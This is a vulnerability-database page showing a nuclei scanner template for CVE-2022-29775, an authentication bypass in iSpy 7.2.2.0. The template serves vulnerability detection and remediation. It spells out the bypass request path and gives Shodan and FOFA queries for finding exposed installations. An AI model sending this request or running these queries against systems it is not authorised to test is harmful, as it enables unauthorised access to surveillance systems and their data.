Lucene search
K

iSpy 7.2.2.0 - Authentication Bypass

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

iSpy 7.2.2.0 Authentication Bypass CVE-2022-2977

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-29775
21 Jun 202214:15
attackerkb
Circl
CVE-2022-29775
21 Jun 202218:27
circl
CNNVD
iSpyConnect iSpy 授权问题漏洞
21 Jun 202200:00
cnnvd
CVE
CVE-2022-29775
21 Jun 202213:59
cve
Cvelist
CVE-2022-29775
21 Jun 202213:59
cvelist
NVD
CVE-2022-29775
21 Jun 202214:15
nvd
OSV
CVE-2022-29775
21 Jun 202214:15
osv
Prion
Authentication flaw
21 Jun 202214:15
prion
RedhatCVE
CVE-2022-29775
22 May 202522:47
redhatcve
id: CVE-2022-29775

info:
  name: iSpy 7.2.2.0 - Authentication Bypass
  author: arafatansari
  severity: critical
  description: |
    iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
  remediation: |
    Upgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability.
  reference:
    - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
    - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29775
    - https://github.com/securylight/CVES_write_ups
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29775
    cwe-id: CWE-287
    epss-score: 0.59916
    epss-percentile: 0.99019
    cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ispyconnect
    product: ispy
    shodan-query:
      - http.html:"iSpy is running"
      - http.html:"ispy is running"
    fofa-query: body="ispy is running"
  tags: cve,cve2022,ispy,auth-bypass,ispyconnect,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/logfile?d=crossdomain.xml'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Log Start'
          - 'Log File'
          - 'iSpy'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402206d3c929944f8b37d288f29bcfa0c342e52241a89297e58924c3a79d4fd0d4da402202e644e4492bf194b83e843ae4319dce4146de7e4c0976e6f2ae26211439295ba:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.59916
32